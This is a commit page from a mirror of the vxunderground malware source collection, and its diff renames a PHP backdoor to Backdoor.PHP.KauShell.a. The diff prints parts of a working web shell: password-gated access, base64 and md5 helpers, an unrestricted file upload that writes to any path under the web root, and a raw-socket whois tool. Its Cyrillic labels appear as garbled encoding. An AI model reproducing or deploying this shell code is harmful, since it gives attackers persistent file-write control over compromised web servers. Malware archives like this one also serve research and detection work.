13
1
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00

Rename Backdoor.PHP.Agent.o to Backdoor.PHP.KauShell.a

This commit is contained in:
vxunderground 2020-10-15 20:37:43 -05:00 committed by GitHub
parent 684272d211
commit 9dbf144641
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -43,7 +43,7 @@ exit;}
else { else {
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login) if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
{ echo "×ňî íŕäî?"; exit;} { echo "×òî íàäî?"; exit;}
} }
*/ */
@ -136,15 +136,15 @@ if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) { switch($_POST['tac']) {
case "1": case "1":
echo "Đŕńęîäčđîâŕííűé ňĺęńň:<b>" .base64_decode($_POST['tot']). "</b>"; echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
break; break;
case "2": case "2":
echo "Ęîäčđîâŕííűé ňĺęńň:<b>" .base64_encode($_POST['tot']). "</b>"; echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
break; break;
case "3": case "3":
echo "Ęîäčđîâŕííűé ňĺęńň:<b>" .md5($_POST['tot']). "</b>"; echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
break; break;
}} }}
break; break;
@ -159,12 +159,12 @@ echo <<<HTML
<form enctype="multipart/form-data" action="$self" method="POST"> <form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload"> <input type="hidden" name="ac" value="upload">
<tr> <tr>
<td>Ôŕéëî:</td> <td>Ôàéëî:</td>
<td><input size="48" name="file" type="file"></td> <td><input size="48" name="file" type="file"></td>
</tr> </tr>
<tr> <tr>
<td>Ďŕďęŕ:</td> <td>Ïàïêà:</td>
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ďîńëŕňü"></td> <td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
$tend $tend
HTML; HTML;
@ -174,12 +174,12 @@ $uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];} if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) { if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Ôŕéëî óńďĺříî çŕăđóćĺí â ďŕďęó $uploadfile\n"; echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
echo "Čě˙:" .$_FILES['file']['name']. "\n"; echo "Èìÿ:" .$_FILES['file']['name']. "\n";
echo "Đŕçěĺđ:" .$_FILES['file']['size']. "\n"; echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
} else { } else {
print "Íĺ óäŕ¸ňń˙ çŕăđóçčňü ôŕéëî. Číôŕ:\n"; print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
print_r($_FILES); print_r($_FILES);
} }
} }
@ -194,11 +194,11 @@ echo <<<HTML
<form action="$self" method="POST"> <form action="$self" method="POST">
<input type="hidden" name="ac" value="whois"> <input type="hidden" name="ac" value="whois">
<tr> <tr>
<td>Äîěĺí:</td> <td>Äîìåí:</td>
<td><input size="40" type="text" name="wq"></td> <td><input size="40" type="text" name="wq"></td>
</tr> </tr>
<tr> <tr>
<td>Őóéç ńĺđâĺđ:</td> <td>Õóéç ñåðâåð:</td>
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td> <td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
</tr> </tr>
<tr><td> <tr><td>
@ -214,7 +214,7 @@ if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser
$querty = $_POST['wq']."\r\n"; $querty = $_POST['wq']."\r\n";
$fp = fsockopen($wser, 43); $fp = fsockopen($wser, 43);
if (!$fp) {echo "Íĺ ěîăó îňęđűňü ńîęĺň";} else { if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
fputs($fp, $querty); fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);} while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp); fclose($fp);